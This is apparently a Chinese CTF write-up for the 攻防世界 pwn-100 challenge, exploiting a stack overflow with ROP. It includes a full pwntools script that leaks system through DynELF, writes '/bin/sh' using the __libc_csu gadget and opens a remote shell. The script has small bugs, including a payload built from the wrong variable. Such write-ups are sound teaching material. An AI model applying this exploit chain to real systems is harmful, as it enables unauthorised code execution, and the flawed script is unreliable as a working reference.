攻防世界进阶区pwn-100

字数:1.1k字 | 预计阅读时长:4分钟

[攻防世界]进阶区pwn-100

可以说这个题做地很难受,一开始不会用gadget,被迫去看大佬的wp,结果大佬的一个“ 显然…… ”让我懵了快一天。真的是一边学一边做才写出来,也学了不少东西。

这个题只开了NX
IDA打开,看字符串窗口,只有puts和read,既没有system也没有bash
IDA打开看伪代码
这个程序的主要部分都在sub_40063D函数中,查看伪代码


这个a1就是sub_40068E中的v1,在sub_40068E可以看到定义v1的栈空间只有0x40,但是sub_40063D中读入了0x200,是一个很明显的栈溢出漏洞
对于一般题来说,这个时候就可以利用puts泄露它本身的地址,再根据libc的偏移算出system和/bin/sh的真实地址,利用ROP就能拿到shell,但是这个题没给libc,所以需要用pwntools的一个模块DynELF来泄露system的地址
由于没有可以用来构造rop的函数,所以需要用到gadget来传参、跳转,用64位中的通用gadget
DynELF需要用puts泄露地址,而puts只需要一个参数,所以找pop rdi; ret传参即可

在IDA中查看发现不太一样,没有0x400763,这是因为这个pop r15是两步组成的,拆开看就行

先按D,把它转换成数据,再把0x400763这行转换成代码 (按C)
拆成数据
拆成代码
这样就可以看到pop rdi;ret了
现在可以用DynELF泄露system地址,可以用找到的gadget构造rop链,但是还缺一个/bin/sh
由于这个程序里有read函数,所以可以用rop链调用read,随便找一个可写入的字段,把 “/bin/sh” 写入进去就行
可以利用gdb中的vmmap查看程序可写入的地址
vmmap查看
r代表只读,rw代表可写,所以只要在0x601000和0x602000之间随便选一小节,够写入 “/bin/sh” 就可以

思路:

  1. 用DynELF泄露system地址
  2. 利用找到的gadget构造rop链
  3. 第一次攻击,用read写入 “/bin/sh” ,并跳转到start来恢复栈,直接跳到main会让栈空间越来越少
  4. 第二次攻击,构造system(“/bin/sh”)
  5. 拿到shell,cat flag

    EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pwn import*

start_addr=0x00400550
pop_rdi=0x00400763
gadget1=0x0040075a
gadget2=0x00400740
binsh_addr=0x00600f00 #只要是在0x601000和0x602000之间,并且够写入 "/bin/sh" ,那就随便挑

io=remote("111.198.29.45","35666")
elf=ELF("./pwn-100")

puts_addr = elf.plt['puts']
read_got = elf.got['read']

def leak(addr): #直接用puts泄露的模板,关于DynELF的模板可以看文章尾部
	count=0
	up=''
	content=''
	payload='a'*72
	payload+=p64(pop_rdi)
	payload+=p64(addr)
    payload += p64(puts_addr)
	payload+=p64(start_addr)
	payload=payload.ljust(200,'a')
	io.send(payload)
	io.recvuntil("bye~\n")
	while True:
		c=io.recv(numb=1,timeout=0.5)
		count+=1
 
		if up == '\n' and c == "": 
			content=content[:-1]+'\x00'
			break				
		else:
			content+=c
			up=c
	content=content[:4]
        log.info("%#x => %s" % (addr, (content or '').encode('hex')))
	return content
 
 
 
d = DynELF(leak, elf = elf) 
system_addr = d.lookup('system', 'libc') #用DynELF获取system地址
log.info("system_addr = %#x", system_addr)
 
payload0='a'*72+p64(gadget1)+p64(0)+p64(1)+p64(read_got)+p64(8)
payload0+=p64(binsh_addr)+p64(0)+p64(gadget2)+'\x00'*56+p64(start_addr)
payload0=payload0.ljust(200,'a') #看程序的伪代码,必须200字符才能结束输入,所以左对齐补到200字符
 
io.send(payload0)
io.recvuntil('bye~\n') #先显示bye才调用的read
io.send('/bin/sh\x00')
 
 
payload1 = "A"*72+p64(pop_rdi)+p64(binsh_addr)+p64(system_addr)
payload1 = payload.ljust(200, "B")	
 
io.send(payload1)
sleep(0.5)
io.interactive()

关于DynELF:可以看看这个大佬的分享
关于64位linux的通用gadget:可以看看这篇文章
payload0解释:

  1. ‘a’*72:让v1溢出,0x40
  2. p64(gadget1): 第一段gadget的起始地址
  3. p64(0)+p64(1):让rbx=0,rbp=1,这样0x400614的跳转不会实现,才能继续进行到gadget2
  4. p64(read_got):read函数地址,放进r12
  5. p64(8):read的参数,读8位
  6. p64(binsh_addr):read参数,写入的地址
  7. p64(0): read的参数
  8. p64(gadget2):第二段gadget的起始地址
  9. ‘\x00’*56:gadget2结束又跳转到gadget1,7个寄存器,每个填8字节,故需要再填充7 * 8字节才能到返回地址
  10. p64(start_addr):第一次攻击后跳转到start,进行栈恢复,这样栈就可以重复利用多次

payload1解释:

  1. “A”*72:让v1溢出,0x40
  2. p64(pop_rdi):跳转到one gadget
  3. p64(binsh_addr):system参数
  4. p64(system_addr):system函数地址,跳转到system

其实这个题完全可以只用one gadget构造rop,而/bin/sh也可以用LibcSearcher来找到
第一次攻击时用 pop rdi;ret 来给puts传参泄露puts真实地址,并跳转回start
第二次攻击也用 pop rdi;ret 来给puts传参泄露read真实地址,并跳转回start
用LibcSearcher得到system,bin/sh偏移,计算真实地址
第三次攻击还用 pop rdi;ret 给system传参,构造system(“/bin/sh”)拿到shell

好活儿,当赏!

微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br>力拔山兮气盖世<br>时不利兮骓不逝
/* */